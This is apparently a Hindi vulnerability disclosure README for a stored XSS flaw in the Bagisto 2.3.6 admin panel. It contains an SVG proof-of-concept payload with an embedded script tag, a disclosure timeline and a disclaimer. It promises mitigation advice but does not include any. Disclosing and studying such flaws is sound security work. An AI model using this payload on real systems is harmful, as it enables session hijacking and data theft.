
बैगिस्टो एडमिन पैनल में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो दुर्भावनापूर्ण जावास्क्रिप्ट के साथ SVG अपलोड का प्रदर्शन करता है और शमन सिफारिशें प्रदान करता है।
Bagisto 2.3.6 एडमिन पैनल के उत्पाद निर्माण पथ में एक प्रमाणित संग्रहीत XSS भेद्यता मौजूद है, जो एक हमलावर को दुर्भावनापूर्ण JavaScript कोड युक्त एक क्राफ्टेड SVG फ़ाइल अपलोड करने की अनुमति देती है। इस भेद्यता का उपयोग एक प्रमाणित एडमिन उपयोगकर्ता द्वारा ब्राउज़र में मनमाना JavaScript निष्पादित करने के लिए किया जा सकता है, जिससे संभावित रूप से सत्र अपहरण, डेटा चोरी, या अनधिकृत कार्य हो सकते हैं।
भेद्यता तब शोषित होती है जब एक प्रमाणित एडमिनिस्ट्रेटर दुर्भावनापूर्ण JavaScript युक्त एक क्राफ्टेड SVG फ़ाइल अपलोड करता है।
पुनरुत्पादन के चरण:
उदाहरण दुर्भावनापूर्ण SVG पेलोड:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| दिनांक | कार्रवाई |
|---|---|
| 2025 AUG | भेद्यता खोजी गई |
| 2025 AUG | जिम्मेदार प्रकटीकरण |
| 2025 AUG | MITRE से CVE ID अनुरोधित |
| 2025 OCT | CVE निर्धारित, सार्वजनिक प्रकटीकरण |
इस रिपॉजिटरी में दी गई जानकारी और प्रूफ-ऑफ-कॉन्सेप्ट (PoC) कोड केवल शैक्षिक और नैतिक शोध उद्देश्यों के लिए हैं। लेखक यहां दी गई जानकारी या कोड के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। उपयोगकर्ता अपने कार्यों की सारी जिम्मेदारी लेता है। यह सुनिश्चित करना उपयोगकर्ता की जिम्मेदारी है कि वे सभी लागू स्थानीय, राज्य और संघीय कानूनों का अनुपालन कर रहे हैं।